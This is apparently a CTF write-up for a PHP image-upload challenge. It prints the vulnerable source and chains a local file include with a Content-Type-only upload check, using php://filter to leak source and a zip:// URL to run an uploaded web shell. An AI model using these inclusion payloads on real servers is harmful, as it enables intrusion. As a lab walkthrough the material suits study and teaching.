http://www.bmzclub.cn/challenges#pimps
The op parameter looks like a file-inclusion point, so try a PHP stream wrapper to read the source. index.php (below) appends .php to the value, so resource=index ends up as index.php, and the base64 filter makes the file come back encoded instead of being executed:
/?op=php://filter/convert.base64-encode/resource=index
index.php
<?php
error_reporting(0);
define('FROM_INDEX', 1);
$op = empty($_GET['op']) ? 'home' : $_GET['op'];
// only ".." is rejected: stream wrappers such as php:// and zip:// pass this check
if(!is_string($op) || preg_match('/\.\./', $op))
    die('Try it again and I will kill you! I fucking hate hackers! Pandadmin.');
ob_start('ob_gzhandler');

function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Panduploader :: <?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
    <div id="header">
        <center><a href="?op=home" class="logo"><img src="images/logo.png" alt=""></a></center>
    </div>
    <div id="body">
<?php
}

function fatal($msg) {
?><div class="article">
    <h2>Error</h2>
    <p><?=$msg;?></p>
</div><?php
    exit(1);
}

function page_bottom() {
?>
    </div>
    <center>
        <div id="footer">
            <div>
                <p>
                    <span>2016 © 1337 Pandas Corporation.</span> All rights reserved.
                </p>
            </div>
        </div>
    </center>
</body>
</html><?php
    ob_end_flush();
}

register_shutdown_function('page_bottom');
page_top($op);
// sink: attacker-controlled $op with ".php" appended
if(!(include $op . '.php'))
    fatal('no such page');
?>
upload.php
<?php
include 'common.php';

if(isset($_POST['submit']) && isset($_FILES['image'])) {
    $fn = $_FILES['image']['tmp_name'];
    $ft = $_FILES['image']['type'];   // client-supplied Content-Type of the multipart part
    if(!is_uploaded_file($fn)) {
        fatal('uploaded file corrupted');
    }
    // the only validation: the declared Content-Type, never the file content
    $array = array('image/png');
    if(!in_array($ft,$array)){
        fatal("Sorry, only PNG files are allowed.");
    }
    $imagekey = create_image_key();
    // stored under a server-chosen name with a fixed .png extension
    move_uploaded_file($fn, "uploads/$imagekey.png");
    header("Location: ?op=show&imagekey=$imagekey");   // the stored name is returned here
} else {
?>
<center>
    <div class="article">
        <h2>Upload your own png file</h2>
        <form enctype="multipart/form-data" action="?op=upload" method="POST">
            <label for="image">Image file (max <?=MAX_IM_SIZE;?>x<?=MAX_IM_SIZE;?>): </label>
            <input type="file" id="image" name="image" />
            <br />
            <input type="submit" name="submit" value="Upload!" />
        </form>
    </div>
</center>
<?php
}
?>
common.php
<?php
if(!defined('FROM_INDEX')) die();
define('MAX_IM_SIZE', 100);

function create_image_key() {
    return sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT'] . time() . mt_rand());
}

function load_image($imagekey) {
    // unanchored: only requires 40 hex characters somewhere in the key
    if(1 !== preg_match('/[0-9a-f]{40}/', $imagekey)) {
        fatal('Invalid image key.');
    }
    $im = imagecreatefrompng("uploads/{$imagekey}.png");
    if(!$im) {
        fatal('Failed to load image.');
    }
    return $im;
}
?>
home.php
<?php
include 'common.php';
?>
<center>
    <div class="article">
        <h2>Welcome to Pandauploader!</h2>
        <p>
            Pandauploader let you upload PNG image files and store it! Have fun with the pandas all for free!<br/>
        </p>
        <p>
            Get started by <a href="?op=upload">uploading a picture</a>
        </p>
    </div>
</center>
Auditing the source: index.php has an include point, but it appends .php to $op, so by itself it can only include PHP files, and the only filter on $op is the check for "..". upload.php has an upload point that checks nothing except the Content-Type of the multipart part, so any content gets through, but the file is stored as uploads/$imagekey.png, which fixes the extension to .png and so blocks a plain uploaded-shell include. The content of the upload is never inspected, so the include point can be combined with the zip:// stream wrapper. zip:// opens an archive on the fly and lets a single file inside it be addressed; the key property is that the archive's own extension is irrelevant, any extension works as long as the bytes are a valid zip archive (zip:// is a local wrapper, so allow_url_fopen/allow_url_include do not gate it, and the path contains no "..", so the filter passes). Because index.php appends .php, the file inside the archive must be named shell.php while the op value references it as shell; the "#" separating archive and entry has to be sent as %23, otherwise the browser treats it as a URL fragment and never sends it.
Procedure: write the web shell as shell.php and zip it, then rename the archive to .png so the browser sends Content-Type: image/png by itself; or upload the .zip as is and change the part's Content-Type to image/png in an intercepting proxy. The upload redirects to ?op=show&imagekey=<sha1>, which hands back the stored name. Then include the entry:
zip://[上传的压缩包路径]%23[压缩文件名称]
/?op=zip://uploads/7f67a5c01bf194128e1a7fe0930a85894b62590f.png%23shell